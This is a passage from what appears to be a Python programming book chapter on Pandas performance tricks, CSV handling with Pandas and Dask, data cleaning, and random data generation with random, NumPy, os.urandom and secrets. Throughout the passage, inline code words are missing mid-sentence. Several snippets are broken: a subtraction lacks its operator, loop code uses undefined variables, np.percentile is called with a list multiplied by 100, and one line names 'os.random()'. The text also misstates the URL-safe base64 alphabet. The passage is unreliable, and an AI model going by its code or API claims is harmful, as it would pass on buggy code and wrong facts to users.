It may not be specific to the Pandas library, but the reason that ‘3 and 5’ evaluate to five is the phenomenon called short-circuit evaluation. In the case of a short-circuit operator, the return value is inferred from the last argument that was evaluated. Pandas and Numpy, on which Pandas has been built, do not use the standard and, or, and not. Rather, we have the &, |, and ~ which are the regular Python bitwise operators. In the case of Pandas, the preceding operators have a higher precedence than the arithmetic operators that are used. What Pandas does is override the internal dunder methods, the likes of .__ror__() which are mapping to the given operators.

The crux here is that the developers of Pandas intentionally did not provision the truth-value of a complete series. If you have ever wondered whether a Series is True or you can’t! It is not defined, or rather ambiguous.

>>> bool(s) ValueError: The truth value of a Series is ambiguous. Use a.empty, a.bool(), a.item(), a.any() or a.all() In case of a Series, you are better off performing the comparisons element-wise. This is the reason for the need for parenthesis, whenever an arithmetic operator is involved here.

Directly load clipboard data with Pandas

Most organisations have stockpiles of data that is stored in the form of text files or Excel sheets. If you have been brave enough to start using Python, you may need some easy ways to copy or transfer the data from these viewable storage formats into a Pandas dataframe. There are APIs readily available, but what if you are in the middle of a terminal or interpreter session and need a quick way to avoid saving the data to file and then read them back. What we can do here is leverage the clipboard of the machine we are working on, as a buffer for reading this data with Pandas, using the pd.read_clipboard() API, using the appropriate combinations by the keyword arguments.

What this will do is enable you to copy any structured data into a DataFrame or Series directly. For illustrating this, let us say we have the following data snippet in Excel:

Figure 6.1: Excel Data Snippet

All you have to do is perform the age-old select and copy the preceding text and then, from the interpreter, simply call the pd.read_clipboard() method: >>> df = pd.read_clipboard(na_values=[None], parse_dates=['d'])

>>> df a         b    c          d 0  0    1.0000  inf 2000-01-01 1  2    7.3891  NaN 2013-01-05 2  4   54.5982  NaN 2018-07-24 3  6  403.4288  NaN        NaT >>> df.dtypes a             int64 b           float64 c           float64 d    datetime64[ns]

dtype: object

Store Pandas objects in a compressed format

This lesser known trick is a cool one to conclude this list. If you are using any Pandas version greater than 0.21.0, you now have the ability to store Pandas objects directly into either a zip, bz2, gzip, or xz compression directly, instead of doing an external compression operation. The command to do this would be the following:

my_data.to_json('my_df.json.gz', orient='records', lines=True, compression='gzip')

It also gives a decent compression ratio, which the sample case we used earlier came to be 11.6x:

>>> import os.path >>> os.path.getsize('my_df.json') / os.path.getsize('my_df.json.gz') 11.617055

Speeding up your Pandas projects

When I first adopted Pandas, I was told that although it was a superb tool for processing and handling datasets, but when it came to statistical modelling, Pandas would not be the fastest player in the team. This evidently turned out to be true over time. Pandas operations on large data chunks did require few seconds to minutes of waiting.

However, what should be focussed on is that Pandas is built on the foundation of native Numpy arrays, which have most of their underlying operations and computations implemented in C. Several internal libraries of Python modules and extensions are created in Cython, and hence, compiled to native C. All this should imply that Pandas should be fast. So, why don’t we get to see the speed?

The truth is that Pandas would indeed be fast, if we used it in the right way, the way it was supposed to be. When we take a closer look at the paradox in place here, we realize that some code that may seem Pythonic in every way, may not be the most optimal one for efficiency when it comes to Pandas. Similar to how Numpy operates, Pandas is primarily designed to tackle vectorized operations which are meant to process complete columns in datasets in a single step. Operating on an individual cell level should be the last thing that one needs to try out.

Pandas is inherently a speed-optimized tool, if properly used. It is worth noting that cleanly written code may not be the same as optimized code when it comes to Pandas. In this section, we will be discussing the Pythonic use of Pandas’ simple yet powerful features. We will also discuss some time saving optimizations for Python projects so that you can focus on the math, rather than the operations.

Optimize Dataframe optimizations with indexing

Just like any other datastore, indexing speeds up the operations in a Pandas Dataframe, which results from the faster lookups and merging. Here is an example of a merge operation with and without an index on a random Dataframe. The following are the results:

%%timeit Dataset_1.merge(dataset_2, on='dataset_id') 439 ms ± 24.5 ms per loop (mean ± std. dev. of 7 runs, 1 loop each)

%%timeit df_1 = reviews.set_index('df_1_id') df_2 = listings.set_index('df_2_id') df_1.merge(df_2, left_index=True, right_index=True) 393 ms ± 17.4 ms per loop (mean ± std. dev. of 7 runs, 1 loop each)

The speedup noticed here also extends to operations of single lookup of the elements in the indexed dataframe (using

Vectorize your Dataframe operations

Vectorizations refers to the process of performing operations on the complete array. Like Numpy, Pandas also has support for optimized vector operations. Always avoid for loops when working with Dataframes, as they make the operations of read/write quite costly. The best options for iterative operations are carried out by APIs like and as an alternative for vectorization. Look at the following comparative stats: # ---- Using .iloc[] ---%%timeit nprc = np.zeros(len(prc,)) for i in range(len(prc)): prc[i] = (prc.iloc[i]['price'] - minPrc) / (maxPrc - minPrc) prc['nprc'] = nprc

8.91 s ± 479 ms per loop (mean ± std. dev. of 7 runs, 1 loop each)

# ---- Using Iterrows() ---%%timeit nprc = np.zeros(len(prc,)) for i, row in prc.iterrows(): nprc[i] = (row['price'] - minPrc) / (maxPrc - minPrc) prc['nprc'] = nprc

3.99 s ± 346 ms per loop (mean ± std. dev. of 7 runs, 1 loop each)

# ---- Using .loc[] ---%%timeit nprc = np.zeros(len(prc,)) for i in range(len(nprc)):

nprc[i] = (prc.loc[i, 'price'] - minPrc) / (maxPrc - minPrc) listings['norm_price'] = norm_prices

408 ms ± 61.2 ms per loop (mean ± std. dev. of 7 runs, 1 loop each)

# ---- Using .map() ---%%timeit prc['nprc'] = prc['price'].map(lambda x: (x – minPrc)/(maxPrc minPrc)) 39.8 ms ± 2.33 ms per loop (mean ± std. dev. of 7 runs, 10 loops each)

# ---- Using Vectorization ---%%timeit prc['nprc'] = (prc['price'] - minPrc) / (maxPrc - minPrc)

1.76 ms ± 107 µs per loop (mean ± std. dev. of 7 runs, 100 loops each)

As evident from the runs, we get a ~80000 times faster execution with vectorization as compared to Therefore, vectorise wherever

possible.

Optimize Dataframe multiplication

When multiplying dataframes, we have an option to use one of the following three methods:

Using the * operator between dataframes.

Using the .multiply() method of the Dataframe. Using the .multiply method of numpy.

The performance metrics for the same dataset among these methods is outlined as follows:

data = np.random.randn(100, 4) df = pd.DataFrame(data, columns=['a', 'b', 'c', 'd']) data = np.random.randn(100, 4) df2 = pd.DataFrame(data, columns=['a', 'b', 'c', 'd'])

%%timeit df*df2 355 µs ± 68.6 µs per loop (mean ± std. dev. of 7 runs, 1000 loops each)

%%timeit df.multiply(df2)

296 µs ± 42.4 µs per loop (mean ± std. dev. of 7 runs, 1000 loops each)

%%timeit np.multiply(df, df2) 120 µs ± 4.11 µs per loop (mean ± std. dev. of 7 runs, 10000 loops each)

We see that the multiply method of numpy is about ~65% faster than the Pandas’ multiply method and ~60% faster than the regular multiplication using the * operator. Using the numpy method is more performant and more Pythonic for most cases.

Using sum() of Numpy instead of sum() of Pandas

NumPy is again the go-to library for summing up the values in your DF. Although, the latest versions of Pandas come with a conversion API using the method before summing up the values. Check out the performance stats on comparing this approach to the native sum() on the Dataframe:

data = np.random.randn(100, 4) df = pd.DataFrame(data, columns=['a', 'b', 'c', 'd']) %%timeit df.sum()

376 µs ± 47.2 µs per loop (mean ± std. dev. of 7 runs, 1000 loops each)

%%timeit df.to_numpy().sum()

18.6 µs ± 1.23 µs per loop (mean ± std. dev. of 7 runs, 10000 loops each) Thus, using the Numpy based sum for DataFrames shows a 95% speedup in the computation time. Therefore, using the numpybased sum is considered one of thebest practices.

Using percentile of Numpy, rather than quantile of Pandas for smaller arrays In the latest Pandas versions, when your dataset is smaller, prefer to use the percentile method of numpy to the quantile method of Pandas.

data = np.random.randn(100, 4) df = pd.DataFrame(data, columns=['a', 'b', 'c', 'd']) %%timeit df.quantile([0.1, 0.4, 0.6, 0.9], axis=1)

1.37 ms ± 103 µs per loop (mean ± std. dev. of 7 runs, 1000 loops each)

%%timeit np.percentile(df, [0.1, 0.4, 0.6, 0.9]*100, axis=1)

1.17 ms ± 28.2 µs per loop (mean ± std. dev. of 7 runs, 1000 loops each)

We see a 15% performance improvement with numpy when the dimensions of the array are relatively smaller. Pandas remains efficient for larger datasets.

How to save time with Datetime data?

Take an example of a sample data that has a column storing a datetime as a string – “1/1/19 10:10”. Pandas and NumPy have a concept of ‘dtypes’, which are nothing but the enforceable data types. The default dtype is an object and is used whenever the user does not specify a type:

>>> df.dtypes date_time      object Now, why is this not optimal? The object in this case is a generic container for any column whose datatype cannot be cleanly inferred. In most practical cases, working with dates in the string format is not only suboptimal in terms of memory-efficiency but also cumbersome. When you work with time-series data, you expect the representation of the column to be of the datetime or Timestamp object types. Using Pandas, this can be easily achieved:

>>> df['date_time'] = pd.to_datetime(df['date_time']) >>> df['date_time'].dtype datetime64[ns] Let us compare the performance of this object implementation versus the Pandas datetime one on a significantly large data set by using a timeit operation. The results are significant:

The object representation records a time of about 1.6 seconds for 8760 rows in the dataset.

On the other hand, when we specify the format of the datetime in Pandas by using the format parameter, we have the following:

>>> @timeit(repeat=3, number=100) >>> def convert_with_format(df, column_name):

…     return pd.to_datetime(df[column_name], …                   format='%d/%m/%y %H:%M')

Best of 3 trials with 100 function calls per trial: Function `convert_with_format` ran in average of 0.032 seconds.

The results noted here show about a 50x speed improvement because Pandas will now not have to individually process every cell in the column to determine its data type. A detail to keep in mind is that the source timestamps are usually not ISO 8601 adherent, hence, you would require them in the YYYY-MM-DD HH:MM format. If a format is not specified, Pandas will use the dateutil library for converting the strings to dates. However, if you already have your raw data in the ISO 8601 format, you will see an improved performance in your applications that involve heavy date parsing. Therefore, explicitly specifying the format is a key step for performance improvement. The alternate option here would be to

use the infer_datetime_format=True in the method parameters, but it should not be one’s first choice in date conversions.

Using .itertuples() and .iterrows() for loops

In cases where we need to multiply the column values by a scalar value, the process is to multiply the dataframe with the scalar multiple. However, if our use case demands a conditional multiplication at each cell level, what do we do? Now, most developers coming from an upbringing in C++ or Java like languages would immediately jump to write a loop here as they have been trained for all this time. Suppose you have a use case, where you have iterated over a Dataframe and applied some processing at every iteration, what would you do? In simple Python terms, one would straight away be thinking about the “for each a, conditional on b, do c”. When the dataframe is large, this turns out to be a time taking and clunky approach. Pandas would consider this as an ‘antipattern’ owing to the following:

Firstly, an additional storage would be needed for persisting the results.

Then, you would also be using the range(0, len(df )) opaque object for looping. You would also be using the concept of ‘chained indexing’ in the dataframe when something like df.iloc[x] ['date_time'] is used.

There is the extensive cost in terms of time associated with this style.

Pandas conventionally does not suggest using the constructs like for i in and hence, it comes bundled with the Dataframe.iterrows() and Dataframe.itertuples() operator functions, which are the generator implementations yielding one value at a time.

on each invocation, returns a namedtuple for the row, that where the index value of the row is the first tuple element.

A namedtuple data structure is part of the collections module in Python. It is similar to the Python tuple, except that its fields are accessible by attribute lookup.

.iterrows() yields pairs (tuples) of (index, Series) for each row in the DataFrame. While .itertuples() tends to be a tad bit faster, let us use .iterrows() in this example, because some readers might not have come across nametuple. >>> @timeit(repeat=4, number=200) … def apply_condition_iterrows(df ): …     cost_list = [] …     for index, row in df.iterrows(): …         data_used = row['data_usage'] …         hour = row['date_time'].hour

…         cost = apply_condition(data_used, hour) …         cost_list.append(cost) …         df['costs'] = cost_list … >>> apply_condition_iterrows(df )

Best of 4 trials with 200 functions calls per trial: Function 'apply_condition_iterrows' ran in average of 0.723 seconds

The preceding syntax presents a decluttered row value references and is more explicit and therefore, readable. In comparison to the use of simple loops, we also note a speedup of almost in addition to the memory footprint improvement.

Making use of Pandas’ .apply()

The next secret is about how to improve upon the .iterrows() operation that we discussed earlier. We use another Pandas builtin utility called the .apply() operation. With this, we can pass a functor as an argument, which can then be applied along the rows and columns of the axis of the Dataframe. Let’s take a look at the use of the lambdas with the function from earlier.

>>> @timeit(repeat=4, number=200) … def apply_condition_withapply(df ): …     df['costs'] = df.apply( …         lambda row: apply_condition( …             kwh=row[data_usage'], …             hour=row['date_time'].hour), …             axis=1) …

>>> apply_condition_withapply(df ) Best of 4 trials with 200 function calls per trial: Function `apply_consition_withapply` ran in average of 0.263 seconds. With this format, we achieve a significant drop in the number of lines of code, thereby making it readable and clean. Also, compared to the .iterrows() method, we also get a 50% improvement in the time consumed.

We are still nowhere close to blazing fast, since the .apply..() method makes use of the Cython iterators for the internal loops. However, in the preceding scenario, the lambda that we used is not directly handleable in Cython, which takes a toll on the speed. We can remedy this by the use of vectorised operations.

Using .isin() to select data

What exactly do we mean by a vectorized operation? When we had multiplied the dataframe column values by a scalar multiple, it was an example of a vectorized operation. That is how we can harness the speed secret of Pandas. One way to apply the conditioned calculations in the form of vectorised operations is by selecting and grouping the different sections in the Dataframe, based on the conditions, and then applying the vectorised operation to every selected group. Let us now take a look at how we can select dataframe rows in Pandas by using the .isin() function and applying the conditions in a vectorised operation. However, before diving into this, we can set the date_time column as the Dataframe’s index.

df.set_index('date_time', inplace=True)

@timeit(repeat=3, number=100) def apply_condition_isin(df ): peak_usage = df.index.hour.isin(range(17, 24)) normal_usage = df.index.hour.isin(range(7, 17)) off_peak_usage = df.index.hour.isin(range(0, 7)) df.loc[peak_usage, 'costs'] = df.loc[peak_usage, 'data_usage'] * 28 df.loc[normal_usage,'costs'] = df.loc[normal_usage,'data_usage'] * 20

df.loc[off_peak_usage,'costs'] = df.loc[off_peak_usage,'data_usage'] * 12

In this example, the .isin() method is returning an array of Boolean values that looks like the following:

[False, False, False, …, True, True, True]

These values correspond to the indices in the dataframe that lie in the specified range. The Boolean array is then passed to the Dataframe’s .loc indexer to generate a slice of the Dataframe containing only the rows that match the specified hours. The slice is then multiplied by the corresponding cost, which is a vectorised operation and hence is faster. Unlike the solutions where loops are involved, the conditional logic here is the art of the selection logic of the rows rather than the processing. This reduces the number of lines in the code.

We observe about 315 times faster performance compared to the loop based implementation. It also observes a 71x speedup in comparison to the .iterrows() version, and about 27x speedup when compared with the .apply() method implementation. This eases the process of operating on larger datasets.

Improving the speed further?

You will notice that in we are still doing some manual work in the calls to df.loc and df.index.hour.isin() three times each. You could argue that this solution is not scalable if we had a more granular range of time slots. (A different rate for each hour would require 24 .isin() calls.) Pandas allows us to handle this in a more programmatic manner with the use of the pd.cut() function in the following case: @timeit(repeat=3, number=100) def apply_condition_cut(df ): ind_cost = pd.cut(x=df.index.hour, bins=[0, 7, 17, 24], include_lowest=True, labels=[12, 20, 28] ).astype(int) df['costs'] = ind_cost * df['data_usage']

Depending on the bin that it is a part of, pd.cut() will apply an array of labels. To indicate whether the first interval is left inclusive or not, the parameter include_lowest is used. This is a completely vectorised way to get the result with an optimal sense of timing. Until now, we have managed to bring down the time cost from about an hour to within a second for processing a 300-site data set. We still have one more option to

explore. In the next section, we will be looking at how Numpy methods can be used for the manipulation of underlying arrays for every Dataframe and combining them back.

Sprinkle some Numpy magic

The Numpy library is the underlying backbone for Pandas Dataframes and Series. This proves advantageous as we can seamlessly integrate Pandas operations and Numpy arrays.

prices = np.array([12, 20, 28]) bins = np.digitize(df.index.hour.values, bins=[7, 17, 24]) df['costs'] = prices[bins] * df['data_usage'].values Similar to the cut() function, this syntax is wonderfully concise and easy to comprehend. How does it fare in terms of performance? We do notice a marginal performance improvement in terms of runtime, as compared to the previous option.

Hence, the gist of what we discussed in this section can be summed up in a hierarchical manner. The suggested improvements generally sorted from the fastest to the slowest, and in order of the most to least flexible are as follows:

Use of vectorized operations – the use of Pandas and Numpy operations. By utilizing the .apply() function with a lambda/functor as an argument.

Use the .itertuples() function to iterate over the rows in a DF as namedtuples.

Using the .iterrows() method over the rows as pairs. However, in this approach, it is costly to create the Series from rows, and accessing them.

The age-old method of loops, with the use of df.loc and df.iloc over each cell or row in the Dataframe.

Using HDFStore to avoid reprocessing

After looking at the ways to speed up our data processing in Pandas, let us discuss a method to avoid reprocessing in the entirety using a newly integrated Pandas feature, called HDFStore.

Sometimes, when we are working on a complex data model, the efficient way to go about it is to pre-process our data set. Let us assume that we have 10 years of usage details for a telecom operator, stored in a minute precision. Now if we only convert the date and time data into Python datetime, it would take about 20 minutes, in spite of providing the format parameter. In any practical scenario, the operations like this should only be done once as a pre-processing step, rather than every time this model is running. The pre-processed data can then be stored in that form and directly loaded when needed. We could save this as a text file or in a CSV format. However, this would lead to a loss in the converted datetime objects.

For storing tabular data, Pandas presents us with HDF5 files that can be used as a high performance storage format. With the help of the HDFStore in Pandas, a Dataframe can be stored in the form of an HDF5 file that has the ability to preserve the columns, data types, and Meta data, while access performance is persisted. You can think of it as a class with read and write features similar to the dictionaries in Python. Let us look at how a Dataframe can be stored as an HDF5 file:

# Access data store data_store = pd.HDFStore('processed_data.h5')

# Retrieve data using key preprocessed_df = data_store['preprocessed_df '] data_store.close()

Multiple tables can be stored in a datastore, using a named key for each. An important point to note is that you are required to have PyTables >= 3.0.0 installed for optimally using the HDFStore in Pandas.

Python and CSV data processing

Despite the hatred that most millennials have for Excel, let us face it, it is not going anywhere. Companies of all scale use Excel to manage the data of some form or another. With the more tech savvy audience, Python comes to the rescue by providing interesting APIs and flexibility to bend the data at your will, thereby assisting in the automation of several processes. In this section, we will look at the different nuances of processing the CSV and Excel data sheets in Python. A CSV file Separated Values file) is a type of plain text file that uses specific structuring to arrange the tabular data. Because it is a plain text file, it can contain only the actual text data—in other words, printable ASCII or Unicode characters.

import csv with open('employee_birthday.txt') as csv_file: csv_reader = csv.reader(csv_file, delimiter=',')

However, let us pull out the weapons of mass destruction assuming that our dataset is rather large – in other words, Pandas. import pandas as pd

# Read the file

data = pd.read_csv("Accidents7904.csv", low_memory=False)

By default, Pandas uses a index if nothing is explicitly specified. To use a different column as the DataFrame index, add the index_col optional parameter:

df = pandas.read_csv('hrdata.csv', index_col='Name')

If your data contains dates that are stored as strings, you can force Pandas to read the data as a date with the parse_dates optional parameter, which is defined as a list of column names to treat as dates: df = pandas.read_csv('hrdata.csv', index_col='Name', parse_dates= ['Hire Date']) If your CSV files do not have the column names in the first line, you can use the names optional parameter to provide a list of column names. You can also use this if you want to override the column names provided in the first line. In this case, you must also tell to ignore the existing column names using the header=0 optional parameter:

df = pandas.read_csv('hrdata.csv', index_col='Employee', parse_dates=['Hired'], header=0, names=['Employee', 'Hired','Salary', 'Sick Days'])

Once you are done with all the processing of the data, you can dump the DataFrame back to a CSV using the to_csv method: df.to_csv('hrdata_modified.csv')

Now, what if you have a huge dataset, let us say, more than 6 GB in size, how do you optimize the read to not choke the system memory completely? The Pandas API provides an option to read these files in chunks, assuming that you can do without having the dataset in memory at the same time. chunksize = 10 ** 6 for chunk in pd.read_csv(filename, chunksize=chunksize): process(chunk) The chunksize parameter specifies the number of rows per chunk. (The last chunk may contain fewer than the chunksize rows, of course.) However, chunking should not always be the first solution for this problem.

If the file is large due to the repeated non-numeric or unwanted columns, then sometimes you can see massive memory improvements by simply reading in the columns as categories and selecting the required columns using the pd.read_csv usecols parameter. If your workflow requires many manipulations, slicing, or exporting, you can use the dask.dataframes to perform the operations

iteratively. Dask silently performs chunking under the hood, and supports a Pandas API subset. Dask is an evolving library that can handle large CSV files rather efficiently with the optimizations performed under the hood without the user having to interfere much. import dask.dataframe as dd filename = '311_Service_Requests.csv' df = dd.read_csv(filename, dtype='str')

Unlike Pandas, the data is not read into memory. We have just set up the dataframe to be ready to do some compute functions on the data in the CSV file using the familiar functions from Pandas. We built a new dataframe using Pandas’ filters without loading the entire original data set into memory. They may not seem like much, but when working with a 7+ GB file, you can save a great deal of time and effort using Dask. Dask seems to have a ton of other great features that is out of the scope of this book, but are outlined really well in the official Dask documentation.

Data cleaning with Pandas and Numpy

Data scientists spend a large amount of their time cleaning datasets and getting them down to a form with which they can work. In fact, many data scientists argue that the initial steps of obtaining and cleaning the data constitute 80% of the job.

Dropping unnecessary columns in a DataFrame

Pandas provides a handy way of removing the unwanted columns or rows from a DataFrame with the drop() function. Let us look at a simple example where we drop a number of columns from a DataFrame.

>>> df = pd.read_csv('/data/Images-Book.csv') >>> df.head() >>> to_drop = ['Edition Statement', …            'Corporate Author', …            'Corporate Contributors', …            'Former owner', …            'Engraver', …            'Contributors', …            'Issuance type',

…            'Shelfmarks']

>>> df.drop(to_drop, inplace=True, axis=1)

We call the drop() function on our object, passing in the inplace parameter as True and the axis parameter as 1. This tells Pandas that we want the changes to be made directly in our object and that it should look for the values to be dropped in the columns of the object. Alternatively, we could also remove the columns by passing them to the columns parameter directly instead of

separately specifying the labels to be removed and the axis where Pandas should look for the labels:

df.drop(columns=to_drop, inplace=True)

Changing the index of a DataFrame

A Pandas Index extends the functionality of NumPy arrays to allow for more versatile slicing and labeling. In many cases, it is helpful to use a uniquely valued identifying field of the data as its index.

>>> df['Identifier'].is_unique True >>> df = df.set_index('Identifier') >>> df.head()

Unlike the primary keys in SQL, a Pandas Index does not assure uniqueness, although many indexing and merging operations will notice a speedup in runtime if it is.

You may have noticed that we reassigned the variable to the object returned by the method with df = This is due to the default behaviour where the method returns a modified copy of our object and does not make the changes directly to the object. This can be avoided by setting the inplace parameter:

df.set_index('Identifier', inplace=True)

Clean columns with .str() methods

We can now get the data to a uniform format to get a better understanding of the dataset and enforce consistency. As discussed earlier, generally a default Dataframe will encapsulate any field that does not fit into a numeric or categorical field cleanly into an object dtype.

Let’s take the following example of cleaning up the date columns: >>> df.loc[1905:, 'Date of Publication'].head(5) Identifier 1905           1888 1929    1839, 38-54 2836        [1897?] 2854           1865 2956        1860-63 Name: Date of Publication, dtype: object

The cleaning can be undertaken in the following aspects:

Remove the extra dates in square brackets, wherever present: 1879 [1878]. Convert the date ranges to their “start date”, wherever present: 1860-63; 1839, 38-54.

Completely remove the dates we are not certain about and replace them with NumPy’s NaN: [1897?].

Convert the string “NaN” to NumPy’s NaN value.

Let us take the following example on how the processing can be applied:

regex = r'^(\d{4})' >>> extr = df['Date of Publication'].str.extract( r'^(\d{4})', expand=False)

>>> extr.head() Identifier 206    1879 216    1868 218    1869 472    1851 480    1857 Name: Date of Publication, dtype: object >>> df['Date of Publication'] = pd.to_numeric(extr) >>> df['Date of Publication'].dtype dtype('float64')

You may have noticed the use of df['Date of This attribute is a way to access faster string operations in Pandas that largely mimic the operations on the native Python strings or compiled

regular expressions, such as and To clean the field, we can combine Pandas str methods with NumPy’s np.where function, which is basically a vectorized form of Excel’s IF() macro. It has the following syntax: >>> np.where(condition1, x1, np.where(condition2, x2, np.where(condition3, x3, …)))

Element-wise dataset cleanup using the DataFrame.applymap()

Let us consider the following sample dataframe: 0           1 0    Mock     Dataset 1  Python     Pandas 2    Real     Python 3   NumPy     Clean In this example, each cell (‘Mock’, ‘Dataset’, ‘Python’, ‘Pandas’, and so on) is an element. Therefore, applymap() will apply a function to each of these independently. Let us assume a function definition in this form:

def do_something(item): # process the item return processed_item

Pandas’ .applymap() only takes one parameter, which is the function (callable) that should be applied to each element:

>>> towns_df =  towns_df.applymap(get_citystate) The applymap() method took each element from the DataFrame, passed it to the function, and the original value was replaced by

the returned value. It is that simple!

While it is a convenient and versatile method, .applymap can have significant runtime for larger datasets, because it maps a Python callable to each individual element. In some cases, it can be more efficient to do vectorized operations that utilize Cython or NumPy (which, in turn, makes calls in C) under the hood.

Skipping rows and renaming columns for CSV file data

We can skip rows and set the header while reading the CSV file by passing some parameters to the function.

>>> olympics_df =pd.read_csv( '/data/olympics.csv', header=1) To rename the columns, we will make use of a DataFrame’s rename() method, which allows you to relabel an axis based on a mapping (in this case, a dict).

>>> new_names =  {'Unnamed: 0': 'Country', …               '? Summer': 'Summer Olympics', …               …               …               …              

'01 !': 'Gold', '02 !': 'Silver', '03 !': 'Bronze', '? Winter': 'Winter Olympics'}

We call the rename() function on our object:

>>> olympics_df.rename(columns=new_names, inplace=True)

Generating random data

How random is random? This is a weird question to ask, but it is one of paramount importance in cases where information security is of concern. Whenever you are generating random data, strings, or numbers in Python, it is a good idea to have at least an idea of how that data was generated. In this section, we will cover a handful of different options for generating random data in Python, and then build up to a comparison of each in terms of its level of security, versatility, purpose, and speed.

Pseudorandom generators

Probably the most widely known tool for generating random data in Python is its random module, which uses the Mersenne Twister PRNG Random Number algorithm as its core generator. With you can make the results reproducible, and the chain of calls after random.seed() will produce the same trail of data:

>>> import random >>> random.seed(987) >>> random.random() 0.5327547554445934

>>> random.random() 0.5288157818367566

>>> random.seed(987)  # Re-seed the randomizer >>> random.random() 0.5327547554445934

>>> random.random() 0.5288157818367566 The sequence of random numbers becomes deterministic, or completely determined by the seed value, 987. Here are some

other common use cases of the random generation use cases for the random API.

>>> random.randint(500, 50000) 18601

>>> random.randrange(1, 10) 5

>>> random.uniform(20, 30) 27.42639687016509

>>> random.uniform(30, 40) 36.33865802745107

>>> items = ['one', 'two', 'three', 'four', 'five'] >>> random.choice(items) 'four' >>> random.choices(items, k=2) ['three', 'three'] >>> random.choices(items, k=3) ['three', 'five', 'four']

# To mimic sampling without replacement, use random.sample() >>> random.sample(items, 4)

['one', 'five', 'four', 'three']

# In place randomization can be achieved with random.shuffle() >>> random.shuffle(items) >>> items ['four', 'three', 'two', 'one', 'five']

PRNGs for arrays – using random and Numpy

If you wanted to generate a sequence of random numbers, one way to achieve that would be with a Python list comprehension:

>>> [random.random() for _ in range(5)] [0.021655420657909374, 0.4031628347066195, 0.6609991871223335, 0.5854998250783767, 0.42886606317322706]

But there is another option that is specifically designed for this. You can think of NumPy’s own numpy.random package as being like the standard library’s random, but for NumPy arrays. (It also comes loaded with the ability to draw from a lot more statistical distributions.). Note that numpy.random uses its own PRNG that is separate from the plain old random. You won’t produce deterministically random NumPy arrays with a call to Python’s own

>>> import numpy as np >>> np.random.seed(444) >>> np.set_printoptions(precision=2) >>> # Samples from the standard normal distribution >>> np.random.randn(5) array([0.36,  0.38,  1.38,  1.18, -0.94])

>>> np.random.randn(3, 4) array([[-1.14, -0.54, -0.55,  0.21], [0.21,  1.27, -0.81, -3.3], [-0.81, -0.36, -0.88,  0.15]])

>>> # `p` is the probability of choosing each element

>>> np.random.choice([0, 1], p=[0.6, 0.4], size=(5, 4))

array([[0, 0, 1, 0], [0, 1, 1, 1], [1, 1, 1, 0], [0, 0, 0, 1], [0, 1, 0, 1]]) >>> # NumPy's `randint` is [inclusive, exclusive), unlike `random.randint()` >>> np.random.randint(0, 2, size=25, dtype=np.uint8).view(bool) array([True, False, True, True, False, True, False, False, False, False, False, True, True, False, False, False, True, False, True, False, True, True, True, False, True])

Before we move on, let us summarize some random functions and their numpy.random counterparts:

Figure 6.2: Random and NumPy counterparts

It is important to note here that NumPy is specialized for building and manipulating large, multidimensional arrays. If you just need a single value, random will suffice and will probably be faster as well. For small sequences, random may be faster as well, because NumPy does come with some overhead.

urandom() in Python – CSPRNG

Python’s os.urandom() function is used by both the secrets and the uuid as a Cryptographically Secure Pseudo Random Number Generator Without getting into much detail, os.urandom() generates operating-system-dependent random bytes that can safely be called cryptographically secure.

On the Unix operating systems, it reads random bytes from the special file/dev/urandom, which in turn allows access to the environmental noise collected from device drivers and other sources. This is garbled information that is particular to your hardware and system state at an instance in time, but at the same time, sufficiently random.

On Windows, the C++ function CryptGenRandom() is used. This function is still technically pseudorandom, but it works by generating a seed value from variables such as the process ID, memory status, and so on.

With there is no concept of manually seeding. While still technically pseudorandom, this function better aligns with how we think of randomness. The only argument is the number of bytes to return:

>>> os.urandom(3) b'\xa2\xe8\x02'

>>> x = os.urandom(6) >>> x b'\xce\x11\xe7"!\x84'

>>> type(x), len(x) (bytes, 6)

Calling .hex() on a bytes object gives an str of hexadecimal numbers, with each corresponding to a decimal number from 0 through 255:

>>> list(x) [206, 17, 231, 34, 33, 132]

>>> x.hex() 'ce11e7222184'

>>> len(x.hex()) 12 Now, how is b.hex() 12 characters long, even though x is only 6 bytes? This is because the two hexadecimal digits correspond precisely to a single byte. The str version of bytes will always be twice as long as far as our eyes are concerned. Even if the byte (such as does not need a full 8 bits to be represented, b.hex() will always use two hex digits per byte, so the

number 1 will be represented as 01 rather than just 1. Mathematically, though, both of these are the same size.

What we see here is how a bytes object becomes a Python str. Another technicality is how bytes produced by os.urandom() get converted to a float in the interval [0.0, 1.0), as in the cryptographically secure version of random.random(). If you’re interested in exploring this further, this code snippet demonstrates how int.from_bytes() makes the initial conversion to an integer, using a base-256 numbering system.

Python 3+ secrets module

Introduced from Python 3.6 onwards, by PEP-0506, the built in secrets module is intended to be the de facto module in Python for the generation of random strings and bytes that are also cryptographically secure.

This module is a tiny one with just about 25 lines of code and is a wrapper around the os.random() API, exposing only a selected set of functions for generating random numbers, bytes, and strings.

>>> n = 16

>>> # Generate secure tokens >>> secrets.token_bytes(n) b'A\x8cz\xe1o\xf9!;\x8b\xf2\x80pJ\x8b\xd4\xd3'

>>> secrets.token_hex(n) '9cb190491e01230ec4239cae643f286f '

>>> secrets.token_urlsafe(n) 'MJoi7CknFu3YN41m88SEgQ' >>> # Secure version of `random.choice()` >>> secrets.choice('rain')

'a'

Let us understand this with the help of an example. We also have used a URL shortener at some point. The basic idea behind one of these is that given a long URL, it generates a random string that has not been previously generated and then map it to the original URL. Let us build a prototype using secrets.

from secrets import token_urlsafe DATABASE = {} def shorten(url: str, nbytes: int=5) -> str: ext = token_urlsafe(nbytes=nbytes)

if ext in DATABASE: return shorten(url, nbytes=nbytes) else: DATABASE.update({ext: url}) return f 'short.ly/{ext}' This may not be what services like bit.ly may be doing exactly by storing stuff in, but it gives the general idea. >>> urls = ( …     'https://realpython.com/', …     'https://docs.python.org/3/howto/regex.html' …)

>>> for u in urls: …     print(shorten(u)) short.ly/p_Z4fLI

short.ly/fuxSyNY

>>> DATABASE {'p_Z4fLI': 'https://realpython.com/', 'fuxSyNY': 'https://docs.python.org/3/howto/regex.html'}

Note that token_urlsafe() uses the base64 encoding, where each character is 6 bits of data. (It is 0 through 63, and corresponding characters. The characters are A-Z, a-z, 0-9, and +/.). If you originally specify a certain number of bytes nbytes, the resulting length from secrets.token_urlsafe(nbytes) will be math.ceil(nbytes * 8 / The bottom line here is that, while secrets is really just a wrapper around the existing Python functions, it can be your go-to when security is your foremost concern.

Universally unique identifiers with uuid()

One option for generating a random token is the uuid4() function from the Python’s uuid module. A UUID is a Universally Unique IDentifier, a 128-bit sequence (str of length 32) designed to “guarantee uniqueness across space and time.” uuid4() is one of the module’s most useful functions, and this function also uses

